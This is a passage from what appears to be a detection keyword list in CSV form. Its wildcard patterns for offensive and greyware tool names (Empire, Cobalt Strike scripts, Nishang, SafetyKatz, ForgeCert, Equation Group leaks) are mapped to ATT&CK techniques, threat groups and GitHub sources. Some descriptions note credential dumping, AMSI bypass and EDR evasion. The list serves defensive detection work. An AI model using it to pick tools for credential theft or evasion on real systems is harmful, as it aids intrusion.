T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus_DotNet*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWebDAVStatus_x64.o*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*GetWhoamiCommand*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWhoamiCommand.cs*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*GetWindowsCredentials.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Get-Wlan-Keys*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-WLAN-Keys*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-WLAN-Keys.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*getwmiregcachedrdpconnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegCachedRDPConnection*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregcachedrdpconnection*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*getwmireglastloggedon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Get-WMIRegLastLoggedOn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmireglastloggedon*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WMIRegMountedDrive*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-wmiregmounteddrive*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-WorkingHours*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*gexplorer.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*ggackgngljinccllcmbgnpgpllcjepgc*","greyware_tool_keyword","WindmillVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ghost_* -v*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost_sparc*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost_x86*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*ghost01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*GhostInTheNet off*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostInTheNet on*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostInTheNet.sh *","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*GhostPack*","offensive_tool_keyword","GhostPack","A collection of security related toolsets.with known hacktools","T1055 - T1203 - T1218 - T1560","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/GhostPack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*GhostPack/ForgeCert*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*GhostPack/Koh*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*GhostPack/SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader 